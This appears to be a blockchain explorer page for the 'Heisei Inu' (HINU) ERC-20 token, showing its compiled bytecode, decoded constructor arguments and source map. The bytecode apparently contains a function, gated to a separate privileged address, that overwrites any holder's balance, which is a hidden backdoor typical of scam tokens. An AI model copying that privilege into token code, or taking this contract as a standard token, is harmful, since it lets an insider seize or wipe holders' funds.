843361034785604051806060016040528060298152602001610af5602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610890565b6105e1565b5060019392505050565b6003546001600160a01b031633146103b55760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064015b60405180910390fd5b60018260ff16101561041d5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103ac565b60006104298183610a6e565b6001600160a01b03909416600090815260016020526040902093909355505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102e491859061034790866105ce565b6000546001600160a01b031633146104db5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ac565b6104e560006108bc565b565b60606005805461025490610a92565b60006102e4338484610709565b6000546001600160a01b0316331461055d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ac565b6001600160a01b0381166105c25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ac565b6105cb816108bc565b50565b60006105da8284610a6e565b9392505050565b6001600160a01b0383166106455760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ac565b6001600160a01b0382166106a75760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ac565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661076e5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103ac565b6001600160a01b0382166107d05760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103ac565b61080d81604051806060016040528060278152602001610ace602791396001600160a01b0386166000908152600160205260409020549190610890565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461083c90826105ce565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106fc9085815260200190565b600081848411156108b45760405162461bcd60e51b81526004016103ac9190610a1b565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461092357600080fd5b919050565b600060208284031215610939578081fd5b6105da8261090c565b60008060408385031215610954578081fd5b61095d8361090c565b915061096b6020840161090c565b90509250929050565b600080600060608486031215610988578081fd5b6109918461090c565b925061099f6020850161090c565b9150604084013590509250925092565b600080604083850312156109c1578182fd5b6109ca8361090c565b946020939093013593505050565b6000806000606084860312156109ec578283fd5b6109f58461090c565b9250602084013560ff81168114610a0a578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610a4757858101830151858201604001528201610a2b565b81811115610a585783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610a8d57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610aa657607f821691505b60208210811415610ac757634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b37cd14fa42bd983df5b5dbedeac1d392bd11a9280a728d599c55163edf4c59e64736f6c63430008040033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000006034ae5d92e7cfc1cb12b6c87850e80a45dea9340000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000a48656973656920496e7500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000448494e5500000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Heisei Inu
Arg [1] : symbol_ (string): HINU
Arg [2] : decimals_ (uint8): 18
Arg [3] : currOwnershipAddr (address): 0x6034ae5D92e7cFc1Cb12B6c87850e80A45DEA934
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000006034ae5d92e7cfc1cb12b6c87850e80a45dea934
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [6] : 48656973656920496e7500000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 48494e5500000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13784:5463:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14649:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15684:210;;;;;;:::i;:::-;;:::i;:::-;;;2089:14:1;;2082:22;2064:41;;2052:2;2037:18;15684:210:0;2019:92:1;14950:108:0;15038:12;;14950:108;;;6028:25:1;;;6016:2;6001:18;14950:108:0;5983:76:1;15902:455:0;;;;;;:::i;:::-;;:::i;17447:316::-;;;;;;:::i;:::-;;:::i;:::-;;14851:91;14925:9;;14851:91;;14925:9;;;;6206:36:1;;6194:2;6179:18;14851:91:0;6161:87:1;16365:306:0;;;;;;:::i;:::-;;:::i;15066:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15217:18:0;15185:7;15217:18;;;:9;:18;;;;;;;15066:177;5578:94;;;:::i;4927:87::-;4973:7;5000:6;4927:87;;-1:-1:-1;;;;;5000:6:0;;;1862:51:1;;1850:2;1835:18;4927:87:0;1817:102:1;14748:95:0;;;:::i;15251:216::-;;;;;;:::i;:::-;;:::i;15475:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15641:18:0;;;15609:7;15641:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15475:201;5827:192;;;;;;:::i;:::-;;:::i;14649:91::-;14694:13;14727:5;14720:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14649:91;:::o;15684:210::-;15803:4;15825:39;3725:10;15848:7;15857:6;15825:8;:39::i;:::-;-1:-1:-1;15882:4:0;15684:210;;;;:::o;15902:455::-;16042:4;16059:36;16069:6;16077:9;16088:6;16059:9;:36::i;:::-;16106:221;16129:6;3725:10;16177:139;16233:6;16177:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16177:19:0;;;;;;:11;:19;;;;;;;;3725:10;16177:33;;;;;;;;;;:37;:139::i;:::-;16106:8;:221::i;:::-;-1:-1:-1;16345:4:0;15902:455;;;;;:::o;17447:316::-;16732:8;;-1:-1:-1;;;;;16732:8:0;3725:10;16732:24;16714:74;;;;-1:-1:-1;;;16714:74:0;;5324:2:1;16714:74:0;;;5306:21:1;5363:2;5343:18;;;5336:30;5402:29;5382:18;;;5375:57;5449:18;;16714:74:0;;;;;;;;;17610:1:::1;17600:6;:11;;;;17578:104;;;::::0;-1:-1:-1;;;17578:104:0;;3740:2:1;17578:104:0::1;::::0;::::1;3722:21:1::0;3779:2;3759:18;;;3752:30;3818:34;3798:18;;;3791:62;-1:-1:-1;;;3869:18:1;;;3862:41;3920:19;;17578:104:0::1;3712:233:1::0;17578:104:0::1;17693:13;17745:10;17693:13:::0;17745:2;:10:::1;:::i;:::-;-1:-1:-1::0;;;;;17721:21:0;;::::1;;::::0;;;:9:::1;:21;::::0;;;;:34;;;;-1:-1:-1;;;17447:316:0:o;16365:306::-;3725:10;16480:4;16574:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16574:34:0;;;;;;;;;;16480:4;;16502:133;;16552:7;;16574:50;;16613:10;16574:38;:50::i;5578:94::-;4973:7;5000:6;-1:-1:-1;;;;;5000:6:0;3725:10;5147:23;5139:68;;;;-1:-1:-1;;;5139:68:0;;4152:2:1;5139:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5139:68:0;4124:182:1;5139:68:0;5643:21:::1;5661:1;5643:9;:21::i;:::-;5578:94::o:0;14748:95::-;14795:13;14828:7;14821:14;;;;;:::i;15251:216::-;15373:4;15395:42;3725:10;15419:9;15430:6;15395:9;:42::i;5827:192::-;4973:7;5000:6;-1:-1:-1;;;;;5000:6:0;3725:10;5147:23;5139:68;;;;-1:-1:-1;;;5139:68:0;;4152:2:1;5139:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5139:68:0;4124:182:1;5139:68:0;-1:-1:-1;;;;;5916:22:0;::::1;5908:73;;;::::0;-1:-1:-1;;;5908:73:0;;3333:2:1;5908:73:0::1;::::0;::::1;3315:21:1::0;3372:2;3352:18;;;3345:30;3411:34;3391:18;;;3384:62;-1:-1:-1;;;3462:18:1;;;3455:36;3508:19;;5908:73:0::1;3305:228:1::0;5908:73:0::1;5992:19;6002:8;5992:9;:19::i;:::-;5827:192:::0;:::o;9013:98::-;9071:7;9098:5;9102:1;9098;:5;:::i;:::-;9091:12;9013:98;-1:-1:-1;;;9013:98:0:o;18623:382::-;-1:-1:-1;;;;;18759:19:0;;18751:69;;;;-1:-1:-1;;;18751:69:0;;4918:2:1;18751:69:0;;;4900:21:1;4957:2;4937:18;;;4930:30;4996:34;4976:18;;;4969:62;-1:-1:-1;;;5047:18:1;;;5040:35;5092:19;;18751:69:0;4890:227:1;18751:69:0;-1:-1:-1;;;;;18839:21:0;;18831:69;;;;-1:-1:-1;;;18831:69:0;;5680:2:1;18831:69:0;;;5662:21:1;5719:2;5699:18;;;5692:30;5758:34;5738:18;;;5731:62;-1:-1:-1;;;5809:18:1;;;5802:33;5852:19;;18831:69:0;5652:225:1;18831:69:0;-1:-1:-1;;;;;18913:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18965:32;;6028:25:1;;;18965:32:0;;6001:18:1;18965:32:0;;;;;;;;18623:382;;;:::o;16826:613::-;-1:-1:-1;;;;;16966:20:0;;16958:71;;;;-1:-1:-1;;;16958:71:0;;2926:2:1;16958:71:0;;;2908:21:1;2965:2;2945:18;;;2938:30;3004:34;2984:18;;;2977:62;-1:-1:-1;;;3055:18:1;;;3048:36;3101:19;;16958:71:0;2898:228:1;16958:71:0;-1:-1:-1;;;;;17048:23:0;;17040:72;;;;-1:-1:-1;;;17040:72:0;;4513:2:1;17040:72:0;;;4495:21:1;4552:2;4532:18;;;4525:30;4591:34;4571:18;;;4564:62;-1:-1:-1;;;4642:18:1;;;4635:34;4686:19;;17040:72:0;4485:226:1;17040:72:0;17205:109;17241:6;17205:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17205:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17185:17:0;;;;;;;:9;:17;;;;;;:129;;;;17348:20;;;;;;;:32;;17373:6;17348:24;:32::i;:::-;-1:-1:-1;;;;;17325:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17396:35;;;;;;;;;;17424:6;6028:25:1;;6016:2;6001:18;;5983:76;11292:240:0;11412:7;11473:12;11465:6;;;;11457:29;;;;-1:-1:-1;;;11457:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11508:5:0;;;11292:240::o;6027:173::-;6083:16;6102:6;;-1:-1:-1;;;;;6119:17:0;;;-1:-1:-1;;;;;;6119:17:0;;;;;;6152:40;;6102:6;;;;;;;6152:40;;6083:16;6152:40;6027:173;;:::o;14::1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:196::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;325:6;317;310:22;272:2;353:29;372:9;353:29;:::i;393:270::-;461:6;469;522:2;510:9;501:7;497:23;493:32;490:2;;;543:6;535;528:22;490:2;571:29;590:9;571:29;:::i;:::-;561:39;;619:38;653:2;642:9;638:18;619:38;:::i;:::-;609:48;;480:183;;;;;:::o;668:338::-;745:6;753;761;814:2;802:9;793:7;789:23;785:32;782:2;;;835:6;827;820:22;782:2;863:29;882:9;863:29;:::i;:::-;853:39;;911:38;945:2;934:9;930:18;911:38;:::i;:::-;901:48;;996:2;985:9;981:18;968:32;958:42;;772:234;;;;;:::o;1011:264::-;1079:6;1087;1140:2;1128:9;1119:7;1115:23;1111:32;1108:2;;;1161:6;1153;1146:22;1108:2;1189:29;1208:9;1189:29;:::i;:::-;1179:39;1265:2;1250:18;;;;1237:32;;-1:-1:-1;;;1098:177:1:o;1280:431::-;1355:6;1363;1371;1424:2;1412:9;1403:7;1399:23;1395:32;1392:2;;;1445:6;1437;1430:22;1392:2;1473:29;1492:9;1473:29;:::i;:::-;1463:39;;1552:2;1541:9;1537:18;1524:32;1596:4;1589:5;1585:16;1578:5;1575:27;1565:2;;1621:6;1613;1606:22;1565:2;1382:329;;1649:5;;-1:-1:-1;;;1701:2:1;1686:18;;;;1673:32;;1382:329::o;2116:603::-;2228:4;2257:2;2286;2275:9;2268:21;2318:6;2312:13;2361:6;2356:2;2345:9;2341:18;2334:34;2386:4;2399:140;2413:6;2410:1;2407:13;2399:140;;;2508:14;;;2504:23;;2498:30;2474:17;;;2493:2;2470:26;2463:66;2428:10;;2399:140;;;2557:6;2554:1;2551:13;2548:2;;;2627:4;2622:2;2613:6;2602:9;2598:22;2594:31;2587:45;2548:2;-1:-1:-1;2703:2:1;2682:15;-1:-1:-1;;2678:29:1;2663:45;;;;2710:2;2659:54;;2237:482;-1:-1:-1;;;2237:482:1:o;6253:229::-;6293:3;6324:1;6320:6;6317:1;6314:13;6311:2;;;-1:-1:-1;;;6350:33:1;;6406:4;6403:1;6396:15;6436:4;6357:3;6424:17;6311:2;-1:-1:-1;6467:9:1;;6301:181::o;6487:380::-;6566:1;6562:12;;;;6609;;;6630:2;;6684:4;6676:6;6672:17;6662:27;;6630:2;6737;6729:6;6726:14;6706:18;6703:38;6700:2;;;6783:10;6778:3;6774:20;6771:1;6764:31;6818:4;6815:1;6808:15;6846:4;6843:1;6836:15;6700:2;;6542:325;;;:::o

Swarm Source

ipfs://b37cd14fa42bd983df5b5dbedeac1d392bd11a9280a728d599c55163edf4c59e

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.